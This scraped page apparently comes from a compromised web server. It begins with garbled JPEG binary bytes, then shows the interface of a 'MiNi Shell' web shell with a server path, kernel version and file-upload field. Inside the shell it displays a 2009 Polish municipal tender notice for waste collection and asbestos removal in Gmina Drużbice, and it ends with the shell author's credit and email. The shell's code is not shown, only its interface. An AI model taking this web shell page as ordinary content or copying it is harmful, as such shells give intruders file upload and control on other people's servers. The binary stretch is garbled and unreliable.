JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/7911-N-2009.html

<p class="kh_header"><b>Drużbice: Świadczenie usług z zakresu gospodarki odpadami na terenie Gminy Drużbice w 2009 r.</b><br>
<b>Numer ogłoszenia: 7911 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Drużbice , Drużbice 77A, 97-403 Drużbice, woj. łódzkie, tel. 044 6311078 (79), faks 044 6311259.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.druzbice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług z zakresu gospodarki odpadami na terenie Gminy Drużbice w 2009 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług z zakresu gospodarki odpadami na terenie Gminy Drużbice w 2009 r. w skład którego wchodzi:

1.	zorganizowanie i obsługa systemu selektywnej zbiórki odpadów komunalnych    gromadzonych w ogólnodostępnych punktach na terenie Gminy Drużbice
 (symbol CPV   90511300-5 - usługi zbierania śmieci).
	 Szczegółowy opis zamówienia zawiera załącznik nr 1.
2. obsługa systemu obwoźnej zbiórki odpadów wielkogabarytowych na terenie Gminy Drużbice (symbol CPV 90511000-2 - usługi wywozu odpadów).
Szczegółowy opis zamówienia zawiera załącznik nr 2.
3. utrzymanie i obsługa gminnego punktu zbiórki odpadów segregowanych 
i wielkogabarytowych (symbol CPV 90511200-4 - usługi gromadzenia odpadów pochodzących z gospodarstw domowych).
Szczegółowy opis zamówienia zawiera załącznik nr 3
4.	usuwanie odpadów zawierających azbest (symbol CPV 90523000-9 - usługi usuwania odpadów toksycznych, z wyjątkiem odpadów radioaktywnych i zanieczyszczonej gleby). Szczegółowy opis zamówienia zawiera załącznik nr 4.


                                                                                                                Załącznik nr 1 

Zorganizowanie i obsługa systemu selektywnej zbiórki odpadów

1. Przedmiotem zamówienia jest zorganizowanie i obsługa systemu selektywnej zbiórki odpadów komunalnych gromadzonych w ogólnodostępnych punktach na terenie Gminy Drużbice (symbol CPV 90511300-5) w skład którego wchodzić będzie:
1.1. sieć punktów wyposażonych w pojemniki do selektywnej zbiórki odpadów z opakowań szklanych w ilości wymienionej w załączniku nr 8 
1.2. sieć punktów wyposażonych w pojemniki do selektywnej zbiórki odpadów z opakowań typu PET w ilości wymienionej w załączniku nr 8
1.3. sieć punktów wyposażonych w pojemniki do selektywnej zbiórki odpadów z papieru i tektury w ilości wymienionej w załączniku nr 8

2. Zakres czynności obejmuje:

2.1. Zadanie l - selektywna zbiórka odpadów z opakowań szklanych:
a) zabezpieczenie pojemników i rozmieszczenie ich w punktach zbiórki odpadów w nieprzekraczalnym terminie do dnia 1 lutego 2009 roku. Wykaz punktów zbiórki odpadów zawiera załącznik nr 8
b) odbiór odpadów z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu). Wykaz, punktów zbiórki odpadów zawiera załącznik nr 8
c) przewóz odpadów na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy);
d) dostarczenie pojemników do miejsc, z których zostały zabrane (jeżeli transport odpadów odbywał się w pojemnikach stanowiących wyposażenie punktów zbiórki);
e) sprzątanie terenu z wszelkich odpadów, które znajdują się w pobliżu pojemnika;
f) mycie pojemników przynajmniej w okresie, który obejmuje zamówienie;
g) naprawę szkód powstałych w trakcie wykonywania czynności wymienionych w punktach a, b, c, d, e oraz f;

2.2. Zadanie 2 - selektywna zbiórka odpadów z opakowań typu PET:
a) zabezpieczenie pojemników i rozmieszczenie ich w punktach zbiórki odpadów w nieprzekraczalnym terminie do dnia 1 lutego 2009 roku. Wykaz punktów zbiórki odpadów zawiera załącznik nr 8;
b) odbiór odpadów z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu). Wykaz punktów zbiórki odpadów zawiera załącznik nr 8;
c) przewóz odpadów na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy);
d) dostarczenie pojemników do miejsc, z których zostały zabrane (jeżeli transport odpadów odbywał się w pojemnikach stanowiących wyposażenie punktów zbiórki);
e) sprzątanie terenu z wszelkich odpadów, które znajdują się w pobliżu pojemnika;
f) naprawę szkód powstałych w trakcie wykonywania czynności wymienionych w punktach a, b, c, d oraz e.

2.3. Zadanie 3 - selektywna zbiórka odpadów z z papieru i tektury
a) zabezpieczenie pojemników i rozmieszczenie ich w punktach zbiórki odpadów w nieprzekraczalnym terminie do dnia l lutego 2009 roku. Wykaz punktów zbiórki odpadów zawiera załącznik nr 8
b) odbiór odpadów z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu). Wykaz punktów zbiórki odpadów zawiera załącznik nr 8
c) przewóz odpadów na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy);
d) dostarczenie pojemników do miejsc, z których zostały zabrane (jeżeli transport odpadów odbywał się w pojemnikach stanowiących wyposażenie punktów zbiórki);
e) sprzątanie terenu z wszelkich odpadów, które znajdują się w pobliżu pojemnika;
f) mycie pojemników w okresie, który obejmuje zamówienie;
g) naprawę szkód powstałych w trakcie wykonywania czynności wymienionych w punktach a, b, c, d, e oraz f.

3. Czynności wymienione w punktach:
2.1 litera b, c, e;
2.2 litera b, c, e;
2.litera b, c, e
winny być wykonywane z częstotliwością w miesiącach od października do marca jeden raz w miesiącu, natomiast w miesiącach od kwietnia do września dwa razy w miesiącu. 
Czynności opisane w punkcie 2.1 litera f i punkcie 2.3 litera f z częstotliwością wskazana przez oferenta lecz nie rzadziej niż raz w kwartale, a czynności opisane w punkcie 2.1 litera g, punkcie 2.2 litera f i punkcie 2.3 litera g według potrzeb lecz nie później niż 7 dni od daty powstania szkody.

4. Składanie comiesięcznych sprawozdań zawierających ilość zebranych odpadów z rozbiciem na poszczególne grupy odpadów. Sprawozdania należy składać na druku stanowiącym załącznik nr 9 do specyfikacji. Sprawozdanie stanowi podstawę wystawienia faktury.

5. Przekazanie Zamawiającemu w ciągu siedmiu dni po zakończeniu realizacji zamówienia sprawozdania zawierającego informacje dotyczące:
rodzaju i ilości odpadów opakowaniowych zebranych w punktach zbiórki;
rodzaju i ilości odpadów opakowaniowych przekazanych do odzysku i recyklingu;
odbiorcy odpadów podlegających przetworzeniu.

6. Przekazywanie Zamawiającemu kopii dokumentów potwierdzających przekazanie odpadów do zakładów wskazanych w ofercie prowadzących ich utylizacje lub odzysk.

7. Zamówienie obejmuje okres od 1 lutego 2009 r. do 31 grudnia 2009 r.

8. Zamawiający zastrzega możliwość zwiększenia ilości punktów wyposażonych w pojemniki do selektywnej zbiórki odpadów w przypadku zwiększenia się potrzeb gminy w tym zakresie..
                                                                                                                Załącznik nr 2 


Obsługa systemy obwoźnej zbiórki odpadów wielkogabarytowych

1.Przedmiotem zamówienia jest obsługa systemu obwoźnej zbiórki odpadów wielkogabarytowych na terenie Gminy Drużbice w okresie od 1 lutego 2009 roku do 
31 grudnia 2009 roku  (symbol CPV 90511000-2).
2. Do obowiązków wykonawcy usługi należeć będzie:
   2.1.zbiórka odpadów wielkogabarytowych w trakcie przejazdu przez wszystkie miejscowości    wchodzące w skład jednostki administracyjnej gminy Drużbice według następującego harmonogramu:
I Zbiórka                                                                               II Zbiórka
9 marca 2009 roku (poniedziałek)                   9  listopada 2009 roku (poniedziałek)
10 marca 2009 roku (wtorek)                        10 listopada 2009 roku (wtorek)
   2.2.opracowanie szczegółowego harmonogramu prac:
          2.3.uzyskanie akceptacji harmonogramu przez przedstawiciela administracji samorządowej,            
2.4.złożenie zaakceptowanego harmonogramu w Urzędzie Gminy najpóźniej na 14 dni przed  wyznaczonym terminem wykonania prac, 
   2.5.zebranie (w tym załadunek na środek transportu) zgromadzonych odpadów,
2.6.dostarczenie i rozładunek odpadów w gminnym punkcie zbiórki odpadów segregowanych   i wielkogabarytowych,
 2.7.sprzątanie miejsca, z którego odebrane były odpady,
 2.8.usuwanie szkód powstałych w trakcie załadunku, transportu i wyładunku odpadów,
2.9.uzyskanie potwierdzenia wykonania prac u przedstawiciela jednostki administracyjnej  samorządowej,
2.10.złożenie w Urzędzie Gminy w Drużbicach sprawozdania z wykonania prac nie później niż 7 dni po ich wykonaniu.
         W sprawozdaniu należy podać ilości zebranych odpadów w rozbiciu na poszczególne grupy.
3.Miejscem rozładunku odpadów będzie gminny punkt zbiórki odpadów segregowanych                i  wielkogabarytowych znajdujący się w miejscowości Drużbice Kolonia.
4. W trakcie prac zbierane będą następujące odpady:

Rodzaje odpadów
Kod
Tekstylia (dywany, tapicerka samochodowa)
20 01 11
Zużyty sprzęt AGD i RTV
20 01 23, 20 01 36
Zużyte opony
20 03 99
Baterie i akumulatory
20 01 33, 20 01 34
Złom metalowy
20 01 40
Przeterminowane lekarstwa
20 01 32
Elementy z tworzyw sztucznych nie mieszczące się w pojemnikach do segregacji w tym wykładziny podłogowe
20 01 39
Zużyte meble i elementy stolarki
20 03 07

Nie będą zbierane: gruz, kamienie i odpady pochodzące z warsztatów rzemieślniczych.

                                                                                                                 Załącznik nr 3 


  Utrzymanie i obsługa gminnego punktu zbiórki odpadów 
segregowanych  i wielkogabarytowych w Drużbicach Kolonii

1.Przedmiotem zamówienia jest utrzymanie i obsługa gminnego punktu zbiórki odpadów segregowanych  i wielkogabarytowych położonego na terenie gminy Drużbice (symbol CPV 90511200-4) w okresie od 1 lutego 2009 roku do 31 grudnia 2009 roku.
2.Lokalizacja punktu Drużbice Kolonia.
3.Zakres czynności obejmuje:
3.1. Zapewnienie pracy punktu w wymiarze minimum 40 godzin tygodniowo, w tym w soboty nie mniej niż 4 godziny. Rozkład czasu pracy powinien zaspokajać potrzeby mieszkańców gminy i być uzgodniony z właścicielem punktu. Treść ustaleń należy przekazać Zamawiającemu.
3.2. Nieodpłatny odbiór odpadów segregowanych pochodzących z gospodarstw indywidualnych z terenu gminy w celu przekazania ich do odzysku lub unieszkodliwiania.
3.3. Pokrywanie kosztów związanych z działalnością punktu.
4.Wyposażenie punktu na czas obowiązywania umowy w dodatkowe narzędzia lub pojemniki w sytuacji, gdy wymagać będzie tego asortyment odpadów odbieranych przez oferenta, a wyposażenie punktu nie będzie wystarczające.
4.1.Prowadzenie rejestru przyjmowanych w punkcie odpadów, zawierającego między innymi informacje o rodzaju, kodzie, masie lub ilości odebranych odpadów, dacie ich dostarczenia do punktu oraz sposobie ich dalszego wykorzystania.
4.2.Składanie Zamawiającemu kwartalnego sprawozdania zawierającego:
a) informacje o rodzaju, kodzie, masie lub ilości odebranych odpadów,
b) dacie ich dostarczenia do punktu oraz sposobie ich dalszego wykorzystania,
Sprawozdania należy składać na druku stanowiącym załącznik nr 9 do Specyfikacji.
c) informację jaka część kwoty należnej za wykonanie przedmiotu przypada na gminę.
4.3.Przekazywanie Zamawiającemu kopii dokumentów potwierdzających przekazywanie odpadów do zakładów wskazanych w ofercie prowadzących ich utylizację lub odzysk.
4.4. Przekazywanie na żądanie jednostki wymienionej w punkcie 2 sprawozdań dotyczących zagospodarowania odpadów.
4.5.Prowadzenie działalności propagującej funkcjonowanie punktu.
5.Oferent, z którym zostanie podpisana umowa, zobowiązany będzie do przejęcia gminnego punktu od właściciela w dniu 31 stycznia 2009 roku oraz zdania go właścicielowi w dniu 31 grudnia 2009 roku. Przejęcie i zdanie gminnego punktu odbywać sie będzie w oparciu o protokół zdawczo - odbiorczy, którego kopie realizujący zamówienie przekaże Zamawiającemu. Przekazanie protokołu do dna               5 stycznia 2010 roku jest warunkiem ostatecznego rozliczenia się z realizującym zadanie.
6.Celem dokładnego poznania przedmiotu zamówienia przedmiotu zamówienia oferent winien skontaktować się z właścicielem punktu wymienionym w punkcie 2.

Załącznik nr 4 

Usuwanie odpadów zawierających azbest


1.Przedmiotem zamówienia jest usuwanie w 2009 roku z terenu Gminy Drużbice odpadów zawierających azbest (symbol CPV - 90523000-9).
2.Do obowiązków Wykonawcy usługi należeć będzie:
2.1.odbiór z z miejsc wskazanych przez Zamawiającego odpadów zawierających azbest,
2.2.transport oraz przekazanie odpadów zgodnie z obowiązującymi przepisami do zakładu utylizacji,
2.3.przedłożenie Zamawiającemu sprawozdania z wykonania usług (w sprawozdaniu należy podać miejsca i ilości zebranych odpadów oraz dołączyć dokumenty potwierdzające odbiór odpadów przez zakład utylizacji).
3.Wykonawca nie może powierzyć wykonania przedmiotu umowy podwykonawcom.
4.Zamówienie należy wykonać w okresie od  1 lutego do 31 grudnia 2009 roku.
5.Przewidywana do zebrania w roku 2009 ilość odpadów zawierających azbest wynosi 10 000 kilogramów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.13.00-5, 90.51.10.00-2, 90.51.12.00-4, 90.52.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu: 

1. spełniają warunki określone przepisami art. 22  ust. 1 ustawy Prawo zamówień publicznych;

2. nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych;

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:  
	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie: Wykonawca /spełnia/ lub /nie spełnia/ poszczególnych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III.2).I. Oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
1.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku gdy osoba podpisująca ofertę nie została wymieniona w tym dokumencie należy dołączyć prawnie skuteczne pełnomocnictwo);
2.aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3.aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4.Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, zwanym dalej /zamówieniem/. (Zezwolenie w trybie art. 28 Ustawy z dnia 27 kwietnia 2001 r. o odpadach;

5.oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - z wykorzystaniem wzoru określonego w zał.6 do SIWZ, 

III.2).II. Oferta wspólna.

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej w rozumieniu art.23 ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:

1.wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,

2.Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza powinien być załączony do oferty i zawierać w szczególności wskazanie:
a)    postępowanie o zamówienie publiczne, którego dotyczy,
b) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,
c)   ustanowionego Pełnomocnika oraz zakres jego umocowania.

3.Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.

4.Dokumenty, o których mowa w sekcji III.2) pkt III.2).I. ppkt 1,2,3 i 5 musi złożyć osobno każdy 
z wykonawców składających ofertę wspólną,

5.W odniesieniu do warunków określonych w art.22 ust. 1 pkt 2 i 3 ustawy wymagania te muszą być spełnione wspólnie przez wykonawców składających ofertę wspólną (nie musi ich spełniać każdy z wykonawców składających ofertę wspólną osobno),

6.Oświadczenia, formularze, dokumenty sporządzone na załączonych do SIWZ wzorach składa i podpisuje w imieniu wszystkich wykonawców Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy i adresu wykonawcy, nazwy i adresy wszystkich wykonawców składających ofertę wspólną,

7.Wszystkie kserokopie dokumentów załączone do oferty muszą być opisane / za zgodność z oryginałem/ i podpisane przez Pełnomocnika,

8.wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie 
z Pełnomocnikiem, którego adres należy wpisać w formularzu ofertowym,

9.Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.

III.2).III.  Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w sekcji III.2)pkt. III.2).I. zastępuje się je odpowiednimi dokumentami, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r.,  Nr 87, poz. 605 z późn. zm)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.druzbice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Drużbicach, Drużbice 77 A, 97 - 403 Drużbice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 10:00, miejsce: Urząd Gminy Drużbice  - pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com